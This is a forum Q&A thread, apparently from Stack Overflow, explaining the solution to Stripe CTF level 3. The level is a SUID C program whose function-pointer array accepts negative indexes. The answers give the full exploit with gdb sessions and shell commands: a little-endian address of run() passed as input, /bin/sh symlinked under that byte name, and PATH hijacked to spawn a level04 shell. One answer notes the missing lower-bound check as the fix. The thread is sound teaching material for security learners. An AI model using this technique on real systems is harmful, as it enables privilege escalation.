# Creating a symlink to a memory address. (SPOILERS: Stripe CTF contest)

Tags: c, security, memory, symlink, stack

So i was trying to do the **Stripe CTF contest**, but I know absolutely nothing about security, so I looked up problem 3 when i got stuck on it. I still don't understand how it works. The **goal of the hack is to access the password** in a file of a different user, by using an application with the `SUID` bit set. Here is the (simplified) code of the application:

```
#define NUM_FNS 4
typedef int (*fn_ptr)(const char *);
int to_upper(const char *str)
int to_lower(const char *str)
int capitalize(const char *str)
int length(const char *str)

int run(const char *str)
{
  // This function is now deprecated.
  return system(str);
}

int truncate_and_call(fn_ptr *fns, int index, char *user_string)
{
  char buf[64];
  // Truncate supplied string
  strncpy(buf, user_string, sizeof(buf) - 1);
  buf[sizeof(buf) - 1] = '\0';
  return fns[index](buf);
}

int main(int argc, char **argv)
{
  int index;
  fn_ptr fns[NUM_FNS] = {&to_upper, &to_lower, &capitalize, &length};

  if (argc != 3) {
    exit(-1);
  }

  // Parse supplied index
  index = atoi(argv[1]);

  if (index >= NUM_FNS) {
    exit(-1);
  }

  return truncate_and_call(fns, index, argv[2]);
}
```

And here is a solution i found: http://pastebin.com/VJ4xpawq

I'm so confused as to why this works. If i run the code with something like ./level03 -28 "`echo foo`;" I get a **segfault**. Also, why is the memory address reversed in his printf function????

I'm lost, and would like to learn. Thank you in advance. :)

Answer (score 12, accepted):

The goal of this code is to execute

```
system("/bin/sh");
```

since the executable has a UID of 'level04', the shell it spawned will  also have a UID of 'level04'.

This can be done by running the "deprecated" `run` function:

```
run("/bin/sh");
```

We notice that in the function `truncate_and_call`, we will call a function, which is selected by user input:

```
return fns[index](buf);
```

**So, we try to create a memory location and make up an `index`, such that `fns[index] == &run`.**

The `index` is bounds-checked by

```
  if (index >= NUM_FNS) {
    exit(-1);
  }
```

which means the malicious `index` we provide must be less than 4 — but it could be negative! Therefore, our goal becomes:

1. Find a memory location *before* `fns` which is writable
2. Write the memory address of `&run` into it
3. Assign `buf` as something which starts the shell.

To check the addresses, we run the program inside `gdb` and break at `truncate_and_call`:

```
$ gdb --quiet --args a.out 1 something
Reading symbols from ~/a.out...done.
(gdb) b truncate_and_call
Breakpoint 1 at 0x80484c5: file 3.c, line 21.
(gdb) r
Starting program: ~/a.out 1 something

Breakpoint 1, truncate_and_call (fns=0xffbffa6c, index=1, user_string=0xffc019ab "something") at 3.c:21
21    strncpy(buf, user_string, sizeof(buf) - 1);
(gdb) list
16  
17  int truncate_and_call(fn_ptr *fns, int index, char *user_string)
18  {
19    char buf[64];
20    // Truncate supplied string
21    strncpy(buf, user_string, sizeof(buf) - 1);
22    buf[sizeof(buf) - 1] = '\0';
23    return fns[index](buf);
24  }
25
```

Notice that there is also a local variable `buf` here, which:

```
(gdb) p &buf
$2 = (char (*)[64]) 0xffbffa00
```

has an address before `fns`. So step 1 is done. We only need to check the `index`, which is

```
(gdb) p (0xffbffa6c - 0xffbffa00) / 4   # 4 == sizeof(*fns)
$4 = 27
```

So the next question is how to write the memory location of `&run` into `buf`. This is easy, because `buf` is just a `strcpy` of `user_string`, the second argument of the function. Check that the address of `run` is

```
(gdb) p &run
$5 = (int (*)(const char *)) 0x80484ac
```

In a **little-endian system**, this address is encoded as the string `"\xAC\x84\x04\x08"`. This string can be obtained from the shell using the `printf` command, or `$'...'`:

```
$ echo `printf "\xac\x84\x04\x08"`
��
$ echo $'\xac\x84\x04\x08'
��
```

So, the last step is to make it start the shell. Because if we assign `"\xac\x84\x04\x08"` to `buf`, what is actually called is

```
run("\xac\x84\x04\x08");
```

but we wanted `"/bin/sh"`, not `"\xac\x84\x04\x08"`! This could be easily worked around by linking `/bin/sh` to a file with name `"\xac\x84\x04\x08"`, and add the directory of that file to `$PATH`:

```
$ export PATH=`pwd`:$PATH
$ ln -s /bin/sh $'\xac\x84\x04\x08'
$ $'\xac\x84\x04\x08'
sh-4.2$ whoami
level03
```

The whole solution is therefore:

```
$ export PATH=`pwd`:$PATH
$ ln -s /bin/sh $'\xac\x84\x04\x08'
$ /levels/level03 -27 $'\xac\x84\x04\x08'
sh-4.2$ whoami
level04
```

(Note: the numbers are a bit different, because I run them on my machine instead of Stripe's.)

---

Also, you get a segfault in `./level03 -28 "echo foo;"` because it will interpret the address to run as `0x6f686365` (the ASCII codes of the 4 bytes 'echo'), which is an invalid address.

Comment: This is really good explanation. I got as far as doing `set variable fns[-1] = &run` in gdb, but couldn't understand why it was still executing as level03. Read about gdb ignoring suid and found your answer next. This is very enlightening. Thanks!

Answer (score 3):

1) fns[-28] points to the address of buf

2) we want to execute the function run which is at 0x804875b

3) so we pass -28 as argv[1] and the address of run as argv[2]

4) index gets the value -28

5) argv[2] is copied to buf

6) so now when the `fns[-28](buf)` is called in truncate_and_call, it executes the function 'run'

7) When run executes, the value of its argument 'str' will be the value of buf

8) so we take the value of buf and symlink it to /bin/sh and

9) put our present directory in the path PATH=$PWD:$PATH - by putting $PWD first, we make sure that our present directory gets looked up first

10)Now when 'system' executes in the run command, it will look for a file with the name same as the value of buf in the path.

11) Since we have already symlinked that to /bin/sh, we get the shell prompt

Comment: Oh man that's smart. I was getting confused thinking fns[-28] was pointing to run, not buf. I see why the symlink has to be the same as the function name though, because the value of buf is both the function name and the parameter. :) wow that helps a lot. thank you. One more question though... how is it possible that the function is being called by that string? the fns[-28] points to '\x5b\x87\x04\x08' but isn't that just chars? or are the memories identical, so that the pointer and the string are basically the same thing?

Comment: we're passing hexadecimal and not ascii by using the `\x`. execute `printf '\x5b\x87\x04\x08'` on your shell and you'll know what I mean. so the memory representation of the pointer address will be same as the memory representation of the string that we are passing

Comment: Why is the string stored backwards though. Is that just a quirk of memory?

Comment: as @nos pointed out, 'The memory address is reversed because it's run on a little endian machine, where the least significant byte is stored first within integers and pointers.'

Answer (score 1):

With `./level03 -28` , you end up executing this:

```
 return fns[index](buf);
```

where index is -28. Which isn't valid, and could lead to a segfault.
The code should validate that index isn't less than zero in addition to validating `index >= NUM_FNS`

The memory address is reversed because it's run on a little endian machine, where the least significant byte is stored first within integers and pointers.